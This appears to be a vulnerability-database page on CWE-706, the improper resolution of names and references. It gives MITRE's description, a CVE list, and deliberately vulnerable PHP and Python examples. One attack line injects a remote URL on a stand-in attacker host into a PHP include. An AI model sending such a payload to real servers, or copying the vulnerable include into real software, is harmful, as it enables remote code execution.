Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-706 (使用不正确的解析名称或索引) — Vulnerability Class 36

36 vulnerabilities classified as CWE-706 (使用不正确的解析名称或索引). AI Chinese analysis included.

CWE-706 represents a critical input validation weakness where a software system incorrectly resolves a name or reference, leading to access of resources outside its intended control sphere. This vulnerability typically arises when applications fail to properly sanitize or validate user-supplied identifiers, allowing attackers to manipulate references to point to unauthorized files, database entries, or network endpoints. Exploitation often involves path traversal or pointer manipulation, enabling unauthorized data access, privilege escalation, or system compromise by redirecting operations to sensitive areas. To mitigate this risk, developers must implement strict input validation, ensuring all references are checked against a whitelist of allowed values. Additionally, using canonicalization techniques to normalize paths before resolution and employing least-privilege principles for resource access can significantly reduce the attack surface, ensuring that resolved references remain within the expected and secure boundaries of the application’s operational environment.

MITRE CWE Description
The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.
Common Consequences (1)
Confidentiality, IntegrityRead Application Data, Modify Application Data
Examples (2)
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
$dir = $_GET['module_name']; include($dir . "/function.php");
Bad · PHP
victim.php?module_name=http://malicious.example.com
Attack
This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an erro…
import os import sys def main(): filename = sys.argv[1] path = os.path.join(os.getcwd(), filename) try: with open(path, 'r') as f: file_data = f.read() except FileNotFoundError as e: print("Error - file not found") main()
Bad · Python
import os import sys def main(): filename = sys.argv[1] path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}") if path.startswith("/home/cwe/documents/"): try: with open(path, 'r') as f: file_data = f.read() except FileNotFoundError as e: print("Error - file not found") main()
Good · Python
CVE IDTitleCVSSSeverityPublished
CVE-2026-40912 Traefik: StripPrefixRegex auth bypass via Path/RawPath desync — traefik 8.2 -2026-04-30
CVE-2026-41402 OpenClaw < 2026.3.31 - Webhook Replay Cache Cross-Target messageId Scope Bypass — OpenClaw 4.2 Medium2026-04-28
CVE-2026-42254 Hickory DNS 安全漏洞 — Hickory DNS 4.0 Medium2026-04-26
CVE-2026-41354 OpenClaw < 2026.4.2 - Insufficient Scope in Zalo Webhook Replay Dedupe Keys — OpenClaw 3.7 Low2026-04-23
CVE-2026-35358 uutils coreutils cp Semantic Loss and Potential Denial of Service with -R via Device Node Stream Reading — coreutils 4.4 Medium2026-04-22
CVE-2026-35666 OpenClaw < 2026.3.22 - Allowlist Bypass via Unregistered Time Dispatch Wrapper — OpenClaw 8.8 High2026-04-10
CVE-2026-35635 OpenClaw < 2026.3.22 - Webhook Path Route Replacement Vulnerability in Synology Chat — OpenClaw 4.8 Medium2026-04-09
CVE-2026-33732 srvx is vulnerable to middleware bypass via absolute URI in request line — srvx 4.8 Medium2026-03-26
CVE-2026-33490 h3: Missing Path Segment Boundary Check in `mount()` Causes Middleware Execution on Unrelated Prefix-Matching Routes — h3 3.7 Low2026-03-26
CVE-2026-1230 Use of Incorrectly-Resolved Name or Reference in GitLab — GitLab 4.1 Medium2026-03-11
CVE-2026-30856 WeKnora: Tool Execution Hijacking via Ambigous Naming Convention In MCP client and Indirect Prompt Injection — WeKnora 5.9 Medium2026-03-07
CVE-2026-25890 File Browser has a Path-Based Access Control Bypass via Multiple Leading Slashes in URL — filebrowser 8.1 High2026-02-09
CVE-2026-25067 SmarterTools SmarterMail < Build 9518 Unauthenticated background-of-the-day Path Coercion — SmarterMail 9.8AICriticalAI2026-01-29
CVE-2025-13437 Arbitrary node_modules Directory Deletion in Google zx — zx 5.5 -2025-11-20
CVE-2025-62378 CommandKit exposes incorrect command name in context object for message command aliases — commandkit 6.1 Medium2025-10-15
CVE-2025-58362 Hono contains a flaw in URL path parsing, potentially leading to path confusion — hono 7.5 High2025-09-04
CVE-2025-30357 NamelessMC Forum Topic Deletion Triggered by Unrelated User Deletion — Nameless 7.3 High2025-04-18
CVE-2025-29914 OWASP Coraza WAF has parser confusion which leads to wrong URI in `REQUEST_FILENAME` — coraza 5.4 Medium2025-03-20
CVE-2024-52515 Nextcloud Server has incomplete sanitization of SVG files allows to embed other images into previews — security-advisories 5.7 Medium2024-11-15
CVE-2024-51746 Use of incorrect Rekor entries during verification in gitsign — gitsign 6.5 -2024-11-05
CVE-2024-45305 gix-path uses local config across repos when it is the highest scope — gitoxide 2.5 Low2024-09-02
CVE-2024-35198 TorchServe bypass allowed_urls configuration — serve 9.8 Critical2024-07-18
CVE-2023-42125 Avast Premium Security Sandbox Protection Link Following Privilege Escalation Vulnerability — Premium Security 7.8 -2024-05-03
CVE-2024-27295 Directus MySQL accent insensitive email matching — directus 8.2 High2024-03-01
CVE-2024-27292 Docassemble unauthorized access through URL manipulation — docassemble 7.5 High2024-02-29
CVE-2023-42451 Mastodon Invalid Domain Name Normalization vulnerability — mastodon 7.4 High2023-09-19
CVE-2023-28643 Potential share collision for recipients when caching is enabled in nextcloud server — security-advisories 5.5 Medium2023-03-30
CVE-2023-28628 `authority-regex` returns the wrong authority in lambdaisland/uri — uri 5.4 Medium2023-03-27
CVE-2022-31089 Invalid file request can crashe parse-server — parse-server 7.5 High2022-06-27
CVE-2022-27778 curl 安全漏洞 — https://github.com/curl/curl 8.1 -2022-06-01

Vulnerabilities classified as CWE-706 (使用不正确的解析名称或索引) represent 36 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.